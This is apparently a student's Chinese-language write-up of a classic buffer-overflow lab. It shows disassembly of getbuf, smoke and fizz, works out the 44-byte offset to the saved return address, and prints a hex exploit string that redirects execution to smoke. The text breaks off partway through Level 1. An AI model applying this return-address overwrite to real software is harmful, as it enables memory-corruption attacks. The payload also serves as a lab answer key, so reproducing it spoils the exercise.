ID:alucard
Cookie:0x1b6069a4
Level 0:
要求getbuf()返回后不回到它的调用者,而是跳到smoke()里面执行
080491f4<getbuf>:
80491f4: 55 push %ebp
80491f5: 89e5 mov %esp,%ebp
80491f7: 83ec 38 sub $0x38,%esp
80491fa: 8d45 d8 lea -0x28(%ebp),%eax
80491fd: 8904 24 mov %eax,(%esp)
8049200: e8f5 fa ff ff call 8048cfa <Gets>
8049205: b801 00 00 00 mov $0x1,%eax
804920a: c9 leave
804920b: c3 ret
08048c18<smoke>:
8048c18: 55 push %ebp
8048c19: 89e5 mov %esp,%ebp
8048c1b: 83ec 18 sub $0x18,%esp
8048c1e: c704 24 d3 a4 04 08 movl $0x804a4d3,(%esp)
8048c25: e896 fc ff ff call 80488c0<puts@plt>
8048c2a: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c31: e845 07 00 00 call 804937b<validate>
8048c36: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c3d: e8be fc ff ff call 8048900<exit@plt>
首先知道了smoke的函数地址为0x08048c18,我们要把它写到ebp上方(0x4(%ebp))的返回地址处,怎么输入呢?观察知-0x28(%ebp)是我们输入字符串的开头,它到返回地址的距离为0x28+4=0x2c,即44字节(40字节缓冲区加4字节保存的ebp),所以我们要先随便输入44个字符,再按小端序输入smoke()的地址
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 8c 04 08
成功。
Level 1:
08048c42<fizz>:
8048c42: 55 push %ebp
8048c43: 89e5 mov %esp,%ebp
8048c45: 83ec 18 sub $0x18,%esp
8048c48: 8b45 08 mov 0x8(%ebp),%eax
8048c4b: 3b05 08 d1 04 08 cmp 0x804d108,%eax
8048c51: 7526 jne 8048c79<fizz+0x37>
8048c53: 8944 24 08 mov %eax,0x8(%esp)
8048c57: c744 24 04 ee a4 04 movl $0x804a4ee,0x4(%esp)
8048c5e: 08
8048c5f: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c66: e855 fd ff ff call 80489c0<__printf_chk@plt>
8048c6b: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c72: e804 07 00 00 call 804937b<validate>
8048c77: eb18 jmp 8048c91<fizz+0x4f>
8048c79: 8944 24 08 mov %eax,0x8(%esp)
8048c7d: c744 24 04 40 a3 04 movl $0x804a340,0x4(%esp)
8048c84: 08
8048c85: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c8c: e82f fd ff ff call 80489c0 <__printf_chk@plt>
8048c91: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c98: e863 fc ff ff call 8048900<exit@plt>
080491f4<getbuf>:
80491f4: 55 push %ebp
80491f5: 89e5 mov %esp,%ebp
80491f7: 83ec 38 sub $0x38,%esp
80491fa: 8d4